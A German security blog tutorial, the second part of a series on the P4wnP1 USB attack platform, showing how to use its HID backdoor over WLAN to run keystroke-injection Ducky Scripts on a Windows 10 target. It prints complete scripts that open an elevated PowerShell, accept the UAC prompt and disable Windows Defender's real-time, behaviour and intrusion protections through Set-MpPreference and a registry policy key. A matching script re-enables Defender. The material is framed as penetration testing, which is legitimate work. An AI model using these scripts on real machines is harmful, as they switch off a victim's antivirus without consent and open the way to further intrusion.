P4wnP1- die USB Angriffsplattform mit Potential (Teil2)

Im ersten Teil habe ich gezeigt, wie der P4wnP1 installiert wird und man eine Verbindung ins Internet herstellen kann. In diesem zweiten Teil werde ich demonstrieren, wie Sie mit Hilfe der Ducky Skripte ein flexibles Werkzeug für Ihre Penetration Tests erzeugen und dazu die eingebaute Backdoor-Funktionalität des P4wnP1 nutzen können.

Um zu zeigen, wie Sie Ducky Skripte mit Hilfe des P4wnP1 anwenden, werden wir in diesem Szenario den Windows Defender in Windows 10 auf dem Zielsystem abschalten. Nachdem Sie weitere Test durchgeführt haben, kann der Schutz mit einem weiteren Skript wieder eingeschaltet werden.

Für unsere Vorhaben benötigen wir zwei Ducky Skripte, die auf dem P4wnP1 platziert werden müssen. Für diese Zwecke steht das Verzeichnis P4wnP1/DuckyScripts/ bereit. Ähnliche Skripte habe ich für einen früheren Beitrag geschrieben. Wie müssen sie nur noch für den P4wnP1 einpassen.

In diesem Szenario nutzen wir die WLAN-Funktionalität des P4wnP1 aus. Der Penetration Tester muss sich also nicht unmittelbar am Zielsystem befinden, sondern kann seine Testumgebung in (WLAN)-Reichweite platzieren. Von hier kann er dann den P4wnP1 fernsteuern bzw. die notwendigen Skripte starten.



Ducky Skripte erstellen

Die Ducky-Skripte könnten wie folgt aussehen:

Disable_Defender.duck

// Turn off Windows Defender Windows 10 1803
// Author: Pentestit.de 20/02/2019
// You take responsibility for any laws you break with this,
// I simply point out the security flaw
//

DELAY 2000
GUI r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
ALT J
DELAY 4000
STRING Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true -DisableBlockAtFirstSeen $true -DisableBehaviorMonitoring $true -MAPSReporting 0
ENTER
DELAY 3000
STRING Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1
ENTER
DELAY 1000
STRING exit
ENTER

Enable_Defender.duck

// Turn on  Windows Defender Windows 10 1803
// Author: Pentestit.de 09/02/2019
// You take responsibility for any laws you break with this,
// I simply point out the security flaw
//

DELAY 2000
GUI r
DELAY 1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 4000
ALT J
DELAY 2000
STRING Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 0
ENTER
DELAY 1000
STRING exit
ENTER

// Reboot target after execution 
ALT F4
ENTER

Bei meinen Tests ist aufgefallen, dass die Zielsysteme je nach Hardware verschieden reagieren. Bei älteren Systemen mit geringerer Leistungsfähigkeit, sollten Sie die Verzögerungen (DELAY) zwischen den einzelnen Befehlen entsprechend hoch wählen. Hier macht es Sinn vor dem Einsatz ein wenig mit der Hardware der Zielsysteme zu experimentieren.

Der Angriff

Um die Skripte nun einzusetzen reicht es aus, sie ins entsprechende Verzeichnis zu kopieren. Der Rest wird vom P4wnP1 übernommen.  Im ersten Teil habe ich gezeigt, wie Sie die Konfiguration des P4wnP1 verändern können. Öffnen Sie dazu die Datei setup.cfg und kommentieren Sie im Bereich „Payload selection“ die Zeile „PAYLOAD=hid_backdoor.txt“ aus. Vergessen Sie nicht die Zeile „PAYLOAD=network_only.txt“ wieder zu kommentieren.

Nach einem Neustart des P4wnP1 wird Ihnen nun folgendes Menü angezeigt:

Der help-Befehl zeigt die verfügbaren Kommandos an. Für unser Beispiel muss nun noch das Tastaturlayout des Zielsystems mittels SetKeyboardLanguage eingestellt werden. Als Standard ist hier us vorgesehen. Ist eine deutschen Tastatur auf dem Zielsystem vorhanden, so müssen Sie hier den Wert 15 auswählen.

Die vorhandenen Ducky Skripte machen Sie mit dem Befehl SendDuckyScript sichtbar und wählen dann die Nummer des gewünschten Skriptes aus. In unserem Beispiel finden das Skript zum Abschalten unter dem Menüeintrag 6.

Nach einer kurzen Wartezeit wird das Skript auf dem Zielsystem ausgeführt. Hier wird zunächst ein Powershell-Fenster mit administrativen Rechten geöffnet. Danach ermöglichen zusätzliche Registry-Einträge, das Abschalten des Windows Defenders.  

Gehen Sie analog dazu vor, um den Defender nach erfolgreichem Test wieder einzuschalten. Beachten Sie, dass der komplette Schutz nach Aufrufen des Skripts erst nach Neustart des Zielsystems wiederhergestellt wird.

Da nachfolgende Video zeigt die Vorgehensweise:

Schreibe einen Kommentar

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.